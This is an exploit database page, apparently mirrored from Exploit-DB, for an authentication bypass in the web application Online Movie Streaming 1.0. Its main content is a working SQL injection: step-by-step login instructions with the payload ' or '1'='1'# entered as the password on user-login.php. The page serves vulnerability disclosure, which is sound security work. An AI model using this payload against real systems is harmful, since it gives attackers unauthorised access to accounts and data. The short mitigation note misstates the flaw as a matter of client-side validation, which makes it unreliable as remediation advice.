header-logo
Suggest Exploit
vendor:
Online Movie Streaming
by:
Kshitiz Raj (manitorpotterk)
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Online Movie Streaming
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10/Kali Linux
2020

Online Movie Streaming 1.0 – Authentication Bypass

An authentication bypass vulnerability exists in Online Movie Streaming 1.0. An attacker can exploit this vulnerability by entering anything@mail.com as the username and ' or '1'='1'# as the password in the user-login.php page. This will allow the attacker to bypass the authentication and gain access to the application.

Mitigation:

The application should use strong authentication mechanisms and should not rely on client-side validation.
Source

Exploit-DB raw data:

# Exploit Title: Online Movie Streaming  1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author:  Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/onlinemovie/user-login.php
Step 2 – Enter Username :-   anything@mail.com
Step 3 -  Enter Password - ' or '1'='1'#

Navigation

Suggest Exploit

Services By CQR